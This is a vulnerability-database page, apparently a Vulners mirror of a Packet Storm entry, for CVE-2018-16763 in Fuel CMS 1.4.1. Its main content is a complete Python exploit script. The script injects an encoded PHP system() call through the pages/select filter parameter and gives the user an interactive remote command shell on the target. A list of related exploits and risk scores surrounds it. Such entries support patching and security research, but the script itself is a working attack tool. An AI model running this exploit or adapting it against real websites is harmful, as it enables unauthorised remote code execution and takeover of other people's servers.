Vulners
Lucene search
Fuel CMS 1.4.1 Remote Code Execution
๐๏ธย 03 Nov 2021ย 00:00:00Reported byย Padsala TrushalTypeย 
ย packetstorm๐ย packetstormsecurity.com๐ย 757ย Views
| Reporter | Title | Published | Views | Family All 26 |
|---|---|---|---|---|
 | fuelCMS 1.4.1 - Remote Code Execution Exploit | 20 Jul 201900:00 | โ | zdt |
| Fuel CMS 1.4.1 - Remote Code Execution Exploit (3) | 3 Nov 202100:00 | โ | zdt |
 | Exploit for Injection in Thedaylightstudio Fuel_Cms | 10 Oct 202020:23 | โ | githubexploit |
| Exploit for Injection in Thedaylightstudio Fuel_Cms | 31 May 202215:31 | โ | githubexploit |
| Exploit for Injection in Thedaylightstudio Fuel_Cms | 10 Oct 202020:23 | โ | githubexploit |
| Exploit for Injection in Thedaylightstudio Fuel_Cms | 3 Nov 202104:38 | โ | githubexploit |
| Exploit for Injection in Thedaylightstudio Fuel_Cms | 9 Apr 202622:37 | โ | githubexploit |
 | CVE-2018-16763 | 9 Sep 201800:00 | โ | attackerkb |
 | CVE-2018-16763 | 13 Jul 202213:02 | โ | circl |
 | FUEL CMS Remote Code Execution (CVE-2018-16763) | 31 May 202000:00 | โ | checkpoint_advisories |
10
`# Exploit Title: Fuel CMS 1.4.1 - Remote Code Execution (3)
# Exploit Author: Padsala Trushal
# Date: 2021-11-03
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: <= 1.4.1
# Tested on: Ubuntu - Apache2 - php5
# CVE : CVE-2018-16763
#!/usr/bin/python3
import requests
from urllib.parse import quote
import argparse
import sys
from colorama import Fore, Style
def get_arguments():
parser = argparse.ArgumentParser(description='fuel cms fuel CMS 1.4.1 - Remote Code Execution Exploit',usage=f'python3 {sys.argv[0]} -u <url>',epilog=f'EXAMPLE - python3 {sys.argv[0]} -u http://10.10.21.74')
parser.add_argument('-v','--version',action='version',version='1.2',help='show the version of exploit')
parser.add_argument('-u','--url',metavar='url',dest='url',help='Enter the url')
args = parser.parse_args()
if len(sys.argv) <=2:
parser.print_usage()
sys.exit()
return args
args = get_arguments()
url = args.url
if "http" not in url:
sys.stderr.write("Enter vaild url")
sys.exit()
try:
r = requests.get(url)
if r.status_code == 200:
print(Style.BRIGHT+Fore.GREEN+"[+]Connecting..."+Style.RESET_ALL)
except requests.ConnectionError:
print(Style.BRIGHT+Fore.RED+"Can't connect to url"+Style.RESET_ALL)
sys.exit()
while True:
cmd = input(Style.BRIGHT+Fore.YELLOW+"Enter Command $"+Style.RESET_ALL)
main_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+quote(cmd)+"%27%29%2b%27"
r = requests.get(main_url)
#<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">
output = r.text.split('<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">')
print(output[0])
if cmd == "exit":
break
`
Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Nov 2021 00:00Current
9.2High risk
Vulners AI Score9.2
CVSS 27.5
CVSS 3.19.8
EPSS0.9391